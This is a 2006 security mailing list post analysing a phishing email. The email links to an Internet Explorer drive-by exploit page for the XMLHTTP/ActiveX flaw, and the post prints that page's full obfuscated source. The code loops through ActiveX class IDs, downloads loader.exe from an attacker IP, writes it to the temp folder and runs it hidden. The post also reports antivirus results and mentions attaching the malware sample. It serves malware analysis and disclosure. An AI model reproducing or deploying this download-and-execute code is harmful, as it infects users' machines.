funsec mailing list archives
Attack of the Day
From: Larry Seltzer <Larry () larryseltzer com>
Date: Fri, 17 Nov 2006 14:50:16 -0500
I got an interesting attack e-mail today. At first it looked like a phish. This was the message: From: estell esmaria [mailto:siselynevin () responsebase com] Sent: Friday, November 17, 2006 12:11 PM To: horatius augustine Subject: Fifth Third Bank informs you Hello again, please visit: http://66.45.250.194/~turnoff/hi/ And it had a cyan background. Not much of a presentation. I loaded the site in the body in my text editor (TextPad is great for that, just file-open and give it the URL) and it's not that long. There's a global string array with a list of GUIDs that I've commented up. The full source for the page is below. BD96C556-65A3-11D0-983A-00C04FC29E36 - RDS Data Control AB9BCEDD-EC7E-47E1-9322-D4A210617116 - ObjectFactory Class 0006F033-0000-0000-C000-000000000046 - Outlook Data Object 0006F03A-0000-0000-C000-000000000046 - Outlook.Application 6e32070a-766d-4ee6-879c-dc1fa91d2fc3 - MUWebControl Class 6414512B-B978-451D-A0D8-FCFDF33E833C - WUWebControl Class 7F5B7F63-F06F-4331-8A26-339E03C0AE3D - WMI Object Broker 06723E09-F4C2-43c8-8358-09FCD1DB0766 - VsmIDE.DTE 639F725F-1B2D-4831-A9FD-874847682010 - DExplore Application Object, DExplore.AppObj.8.0 BA018599-1DB3-44f9-83B4-461454C84BF8 - Microsoft Visual Studio DTE Object, VisualStudio.DTE.8.0 D0C07D56-7C69-43F1-B4A0-25F5A11FAB19 - Microsoft DbgClr DTE Object, Microsoft.DbgClr.DTE.8.0 E8CCCDDF-CA28-496b-B050-6C07C962476B - VsaIDE.DTE I guess this is one of the exploits for the Microsoft XMLHTTP bug they just patched. The page loops through each of these GUIDs, creating an object and using it to create an XMLHTTP object. It uses this to run shellcode in the form of the file at http://66.45.250.194/~turnoff/hi/loader.exe. I got the file and ran it through VirusTotal. Only four engines said anything at all: AntiVir 7.2.0.39 11.17.2006 HEUR/Crypted BitDefender 7.2 11.17.2006 Generic.Malware.Sdldg.10CF2C7A eSafe 7.0.14.0 11.16.2006 suspicious Trojan/Worm Fortinet 2.82.0.0 11.17.2006 suspicious Hooray for Antivir, the only one with something useful to say. Here's Antivir's writeup on HEUR/Crypted: http://www.avira.com/en/threats/section/fulldetails/id_vir/2704/heur_cry pted.html I've attached the file in a ZIP file with the password 'loader' LJS ------------------------------------------------------ [[!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"]] [[html]][[head]][[title]]Google[[/title]] [[script type="text/javascript" language="javascript"]] var obj_t = new Array( 'BD96C556-65A3-11D0-983A-00C04FC29E36', 'AB9BCEDD-EC7E-47E1-9322-D4A210617116', '0006F033-0000-0000-C000-000000000046', '0006F03A-0000-0000-C000-000000000046', '6e32070a-766d-4ee6-879c-dc1fa91d2fc3', '6414512B-B978-451D-A0D8-FCFDF33E833C', '7F5B7F63-F06F-4331-8A26-339E03C0AE3D', '06723E09-F4C2-43c8-8358-09FCD1DB0766', '639F725F-1B2D-4831-A9FD-874847682010', 'BA018599-1DB3-44f9-83B4-461454C84BF8', 'D0C07D56-7C69-43F1-B4A0-25F5A11FAB19', 'E8CCCDDF-CA28-496b-B050-6C07C962476B'); function CreateO(o, n) { var r = null; try { eval('r = o.CreateObject(n)') }catch(e){} if (! r) { try { eval('r = o.CreateObject(n, "")') }catch(e){} } if (! r) { try { eval('r = o.CreateObject(n, "", "")') }catch(e){} } if (! r) { try { eval('r = o.GetObject("", n)') }catch(e){} } if (! r) { try { eval('r = o.GetObject(n, "")') }catch(e){} } if (! r) { try { eval('r = o.GetObject(n)') }catch(e){} } return(r); } function iii() { return true; } var iss = false; uri = 'http://66.45.250.194/~turnoff/hi/loader.exe'; window.onerror = iii; var za = 'ting.FileS'; var z = 'plication'; var shellapp = 'Shell.Ap'+z; var z01 = "r%20%3D%20o.Creat'+'eObject%'+'28n%29"; var z02 = "r%20%3D%20o.Creat'+'eObject%28n%'+'2C%20%22%22%29"; var z03 = "r%20%3D%20o.Create'+'Object%28n%2C'+'%20%22%22%2C%20%22%22%29"; var z04 = "r%20%3D%20o.GetOb'+'ject%28%'+'22%22%2C%20n%29"; var z05 = "r%20%3D%20o.GetObject%28n%'+'2C%20%22%22%29"; var z06 = "r%20%3D%2'+'0o.GetObject%28n%29"; var a1 = 'ADO'; var a2 = 'DB.'; var a3 = 'Str'; var a4 = 'eam'; function rname() { var chars = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXTZabcdefghiklmnopqrstuvwxyz"; var string_length = 8; var randomstring = ''; for (var i=0; i[[string_length; i++) { var rnum = Math.floor(Math.random() * chars.length); randomstring += chars.substring(rnum,rnum+1); } return randomstring + '.com'; } function DoIt() { x.Open('GET',uri + '?e=' + escape(rname()),false); x.Send(); var fname1 = rname(); var f = xml.CreateObject('Scrip'+za+'ystemObject',''); var tmp = f.GetSpecialFolder(2); fname1 = f.BuildPath(tmp,fname1); S.open(); S.write(x.responseBody); S.savetofile(fname1,2); S.close(); var Q = xml.createobject(shellapp,''); Q.ShellExecute(fname1,'','','open',0); } [[/script]][[/head]][[body]] [[script type="text/javascript" language="JavaScript"]] if (navigator.userAgent.indexOf('MSIE') != -1) { var ni = 0; while (obj_t[ni]) { var xml = null; var xml = document.createElement('object'); guid = obj_t[ni]; xml.setAttribute('classid','clsid:'+guid); if (xml) { n_xml = 'Microsoft.XMLHTTP'; try { var x = null; var x = CreateO(xml,n_xml); if (x) { str1 = a1 + a2; str1 = str1 + a3 + a4; str5 = str1; var S = xml.CreateObject(str5,""); S.type = 1; str6 = 'GET'; DoIt(); } } catch(e){} } ni++; } } [[/script]] [[/body]][[/html]]
Attachment:
loader.zip
Description: loader.zip
_______________________________________________ Fun and Misc security discussion for OT posts. https://linuxbox.org/cgi-bin/mailman/listinfo/funsec Note: funsec is a public and open mailing list.
Current thread:
- Entire Supreme Court was sent poisoned cookies Richard M. Smith (Nov 17)
- Attack of the Day Larry Seltzer (Nov 17)